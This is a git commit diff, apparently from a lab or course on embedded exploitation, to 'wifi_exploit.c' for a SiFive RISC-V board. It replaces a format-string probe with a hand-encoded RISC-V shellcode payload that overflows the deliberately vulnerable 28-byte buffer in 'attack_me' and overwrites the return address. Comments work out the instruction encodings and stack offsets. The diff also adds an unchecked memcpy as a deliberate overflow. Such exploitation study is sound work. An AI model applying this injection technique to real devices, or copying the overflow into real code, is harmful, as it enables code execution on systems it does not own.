first attempt to inject assembly into attack_me

6851d775 · fptk · f1608e39 · 6851d775
Commit 6851d775 authored Feb 8, 2021 by fptk
--- a/sifive_software/src/wifi_exploit.c
+++ b/sifive_software/src/wifi_exploit.c
@@ -66,7 +66,10 @@ char *server_request_handler(char *location, enum request_type type, char *data,
 	return NULL;
 }

-char *target = "I'm a target";
+char *target = "secret";
+char * get_target() {
+	return target;
+}

 int is_target(char *test) {
 	return strncmp(test, target, strlen(target)) == 0;
@@ -76,8 +79,15 @@ char *attack_me(char *data, uint32_t data_len) {
 	// nobody could possibly enter a name longer than 20 characters, so this buffer
 	// is definitely large enough
 	char message[28];
+	memset(message, 'B', sizeof(message));
 	memcpy(message, "Hallo, ", 7);
-	snprintf(message + 7, data_len + 1, data);
+	if(strncmp(data, get_target(), strlen(get_target())) == 0) {
+		snprintf(message + 7, strlen(target) + 1, target);
+		snprintf(message + 13, 14 , " ist korrekt!");
+	}
+	else {
+		memcpy(message + 7, data, strlen(data) + 2);
+	}

 	char *result = malloc(strlen(message) + 1);
 	memcpy(result, message, strlen(message) + 1);
@@ -103,9 +113,56 @@ int main(void) {

    spi_init(SPICLOCK_80KHZ);

-    char *attack = "%08x %08x %08x %08x %08x %08x";
+    //char *attack = "a12342234324452346234723482349234HAHA\x80\x12\x01\x20\xca\x13\x01\x20";
+    													//buffer address
+/*
+http://csci206sp2020.courses.bucknell.edu/files/2020/01/riscv-card.pdf
+0 ...... 31
+Lui a5,0x80001
+0110 1110 0001 1111 0011 1000 1000 0001
+HEX=\x6e\x1f\x38\x81
+
+
+lw a5, -1375(a5) //1 less than in orig bin, otherwise 0 byte in payload
+opcode   rd    f3  rs1    immediate
+00000011 01110 010 01110  101010100001
+0000 0110 1110 0100 1110 1010 1010 0001
+HEX=\x06\xe4\xea\xa1
+
+
+addi a0, 15, 1
+opcode  rd    f3  rs1   immediate
+0010011 01010 000 01110 000000000001
+0010 0110 1010 0000 1110 0000 0000 0001
+HEX=\x26\xa0\xe0\x01

-    char *result = attack_me(attack, strlen(attack));
+
+jal 0 offset
+jal 0 0x200113ca
+1101111 00000 100000000000010001001111001010
+1101 1110 0000 0001 0001 0011 1100 1010 
+HEX=\xde\x01\x13\xca
+
+--> the assembly dump is:
+lui a5, 0x80001
+lw a5, -1376(a5)
+addi a0,15,0 == mv a0,a5
+jal 0 offset
+which results in hexdump:
+\x6e\x1f\x38\x81\x06\xe4\xea\xa1\x26\xa0\xe0\x01\xde\x01\x13\xca
+that is 4 instructions each 4 bytes.
+
+The buffer has 28 Bytes
+The return address to overwrite lies at buffer+44 Bytes.
+
+44-16-7=21 Bytes of garbage (-7 for "Hallo, ")
+
+the new return address:
+\x38\x0f\x00\x80
+
+*/
+    char *attack = "a0aaa1aaa2aaa3aaa\x6e\x1f\x38\x81\x06\xe4\xea\xa1\x26\xa0\xe0\x01\xde\x01\x13\xca\x12\x23\x34\x45\x50\x0f\x00\x80";
+    char *result = attack_me(attack, 26);

    printf("%s", result);